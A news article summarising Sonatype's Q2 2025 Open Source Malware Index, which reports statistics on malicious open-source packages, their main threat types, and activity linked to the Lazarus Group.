Software supply chain management firm Sonatype Inc. today said it found a sharp rise in malicious activity targeting software developers and supply chains in the second quarter.

The company’s Q2 2025 Open Source Malware Index report identifies 16,279 newly discovered malicious open-source packages across popular ecosystems such as npm, PyPI and Maven Central. That brings the total number of malware packages discovered by Sonatype to 845,204. The figure for the second quarter jumped 188% from the same period last year, highlighting the growing scale and sophistication of threats exploiting open-source infrastructure.

Data exfiltration was found to be the leading threat vector in the quarter, accounting for 55% of the malicious packages detected. More than 4,400 packages were found to be designed to specifically to steal secrets and sensitive data, including personally identifiable information, access tokens, passwords and application programming interface keys. The attacks are increasingly targeting critical junctions between developer tools and production environments, where a single leak can compromise entire systems.

Sonatype also observed a surge in more destructive forms of malware. Notable among them were data corruption packages, which aim to sabotage systems by damaging files or injecting malicious code and were found to have more than doubled in prevalence during the quarter. Data corruption packages now represent more than 3% of all malicious packages, reflecting a broader shift toward more aggressive attack payloads intended to disrupt and degrade systems beyond simple data theft.

On the malware side, cryptomining malware dropped slightly, making up just 5% of packages in the second quarter. The decline suggests that attackers may be pivoting toward more lucrative or impactful outcomes, such as credential theft, espionage and long-term infiltration, rather than immediate resource exploitation.

The Lazarus Group, the North Korea–linked advanced persistent threat group known for its high-profile cyber operations, was linked to 107 malicious packages in the quarter that were collectively downloaded more than 30,000 times. Sonatype argues that the activity by Lazarus demonstrates that even highly advanced nation-state actors are operationalizing open-source software to conduct cyber espionage, financial crimes and infrastructure sabotage.

Sonatype’s Open Source Malware Index draws from its proprietary behavioral and automated malware detection systems, actively monitoring and analyzing activity across ecosystems such as npm, PyPI, Maven Central and more.

Image: SiliconANGLE/Reve